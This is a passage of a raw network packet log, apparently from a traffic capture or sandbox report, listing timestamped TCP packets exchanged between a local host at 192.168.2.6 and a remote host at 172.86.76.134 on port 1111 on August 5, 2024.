                              Aug 5, 2024 14:40:49.800517082 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.800534010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800565958 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800604105 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800606012 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.800637960 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.800678968 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.800964117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801012993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801044941 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801052094 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.801076889 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801110983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801120996 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.801143885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801176071 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801178932 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.801208019 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801239967 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801245928 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.801271915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801306009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801315069 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.801337957 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801371098 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801383972 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.801402092 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801434994 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801446915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.801467896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801500082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801503897 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.801937103 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801970959 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.801980972 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802002907 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802036047 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802042007 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802066088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802098036 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802103043 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802131891 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802165031 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802171946 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802197933 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802229881 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802236080 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802262068 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802295923 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802298069 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802328110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802360058 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802369118 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802393913 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802426100 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802433968 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802458048 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802490950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802499056 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802524090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802561045 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.802944899 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.802977085 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803011894 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803018093 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803044081 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803076029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803080082 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803109884 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803143024 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803148031 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803175926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803266048 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803272009 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803298950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803330898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803333998 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803364992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803396940 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803405046 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803430080 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803462029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803469896 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803494930 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803527117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803531885 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803560972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803602934 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.803905010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803939104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803972006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.803977966 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804004908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804037094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804049969 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804069996 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804101944 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804114103 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804136992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804168940 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804177999 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804203033 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804234982 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804239035 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804266930 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804301023 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804306030 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804332972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804366112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804372072 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804398060 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804430008 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804438114 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804466009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804507017 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804696083 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804729939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804763079 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804768085 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.804795980 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.804828882 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.897675991 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.897747993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.897802114 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.897836924 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.897869110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.897911072 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898006916 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898006916 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898006916 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898103952 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898140907 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898175001 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898189068 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898369074 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898401976 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898421049 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898442030 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898483038 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898519993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898551941 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898590088 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898602009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898638010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898669958 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898680925 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898704052 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898746014 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898821115 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898853064 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898885965 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898890972 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.898925066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898961067 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.898964882 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.899014950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.899054050 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.900146961 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900283098 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900331974 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.900337934 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900373936 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900405884 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900417089 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.900446892 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900490046 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.900500059 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900618076 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900650024 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900664091 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.900687933 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900724888 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900724888 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.900758028 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900794029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900799990 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.900891066 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900934935 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.900943041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.900975943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901007891 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901017904 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.901046991 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901079893 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901088953 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.901113987 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901145935 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901153088 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.901180029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901220083 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.901397943 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901433945 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901468992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901473045 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.901520014 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901552916 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901561975 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.901586056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901623964 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901628971 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.901657104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901690006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901700020 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.901727915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.901767015 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.902107000 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902139902 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902180910 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.902193069 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902228117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902260065 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902275085 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.902297974 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902329922 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902345896 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.902363062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902395010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902403116 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.902427912 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902460098 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902465105 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.902492046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902523994 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902534962 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.902556896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902590036 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902595997 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.902622938 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902654886 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.902661085 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903048038 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903084040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903098106 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903135061 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903192043 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903204918 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903234005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903265953 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903266907 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903302908 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903337002 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903340101 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903371096 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903403997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903412104 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903438091 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903470993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903476954 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903503895 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903537035 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903543949 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903570890 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903601885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903608084 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903635025 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903667927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903676033 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.903702974 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.903742075 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.904077053 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904129982 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904165030 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.904259920 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904294968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904326916 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904335022 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.904365063 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904397964 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904407978 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.904431105 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904464006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904472113 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.904515982 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904547930 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904553890 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.904581070 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904613972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904619932 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.904647112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904684067 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.904762030 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904841900 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.904885054 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.986804962 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.986926079 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.986958981 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.986995935 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.987114906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987148046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987180948 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987217903 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987253904 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.987253904 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.987271070 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987308979 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987310886 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.987343073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987375975 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987381935 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.987409115 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987442017 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987449884 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.987498999 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987531900 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987534046 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.987565041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987597942 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987603903 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.987648010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.987689018 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.988759041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988769054 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988779068 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988789082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988799095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988810062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988821030 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988827944 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.988831997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988843918 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988854885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988873959 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988874912 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.988884926 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988894939 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988898993 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.988904953 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988917112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988924026 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.988928080 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988940001 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988948107 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.988950968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.988970041 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.988986969 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.989181995 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989192009 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989211082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989223003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989227057 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.989232063 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989243031 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989253998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989253998 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:49.989264965 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989275932 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989286900 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:49.989291906 CEST497211111192.168.2.6172.86.76.134
